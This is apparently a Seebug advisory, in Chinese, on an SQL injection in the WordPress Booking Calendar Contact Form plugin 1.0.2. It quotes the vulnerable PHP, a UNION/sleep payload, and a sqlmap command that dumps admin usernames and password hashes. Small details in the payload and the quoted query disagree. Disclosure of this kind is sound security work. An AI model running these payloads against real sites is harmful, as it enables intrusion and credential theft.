WordPress Booking Calendar Contact Form Plugin 1.0.2 /dex_bccf.php SQL注入漏洞

2015-05-27T00:00:00
ID SSV:89217
Type seebug
Reporter Root
Modified 2015-05-27T00:00:00

Description

<ul><li>/dex_bccf.php</li></ul><pre class="">function dex_bccf_caculate_price($startday, $enddate, $calendar,

$default_price) {

...

//$calendar is not sanitized in sql query

$codes = $wpdb->get_results( 'SELECT * FROM

'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE

cal_id='.$calendar);

$mode =

(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==

'false');

while (

       (($enddate&gt;$startday) &amp;&amp; !$mode) ||

       (($enddate&gt;=$startday) &amp;&amp; $mode)

       )

{

    $daily_price = $default_price;

    $sprice = array();

    foreach ($codes as $value)

    {

       $sfrom = strtotime($value-&gt;date_from);

       $sto = strtotime($value-&gt;date_to);

       if ($startday &gt;= $sfrom &amp;&amp; $startday &lt;= $sto)

       {

           $sprice = explode (';', $value-&gt;price);

           $daily_price = $sprice[0];

       }

    }

    $season_prices[] = $sprice;

    $price += $daily_price;

    $startday = strtotime (date("Y-m-d", $startday)." +1 day");

//606024;

    $days++;

}

...

} </pre><p>$calendar未经过过滤带入SQL语句导致注入。为了达成注入条件,需要令:</p><pre class="">$enddate>$startday</pre><p>并且</p><pre class="">$startday >= $sfrom && $startday <= $sto</pre><p>构造querystring:</p><pre class="">action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2</pre><p>POST内容:</p><pre class="">dex_item=1 union select 0x32323B2332,1,sleep(10),3,0x323031342D312D33</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM wp_bccf_reservation_calendars WHERE id=1 union select 0x32323B2332,1,sleep(3),3,0x323031342D312D33</pre><p>证明漏洞存在。</p><p>使用sqlmap,获取管理员的帐号密码。使用命令:</p><pre class="">python sqlmap.py -u "http://10.211.55.3/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2" --data="dex_item=1" -p dex_item --dbms=mysql -D wordpress -T wp_users -C user_login,user_pass --dump<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;"> </span></pre><p><img alt="C41F761A-C60C-4806-9951-6B640FFF9961.png" src="https://images.seebug.org/@/uploads/1434437047822-C41F761A-C60C-4806-9951-6B640FFF9961.png" data-image-size="811,427"><br></p><p>得到管理员的帐号密码: </p><p><img alt="2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" src="https://images.seebug.org/@/uploads/1434437067124-2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" data-image-size="838,368"><br></p>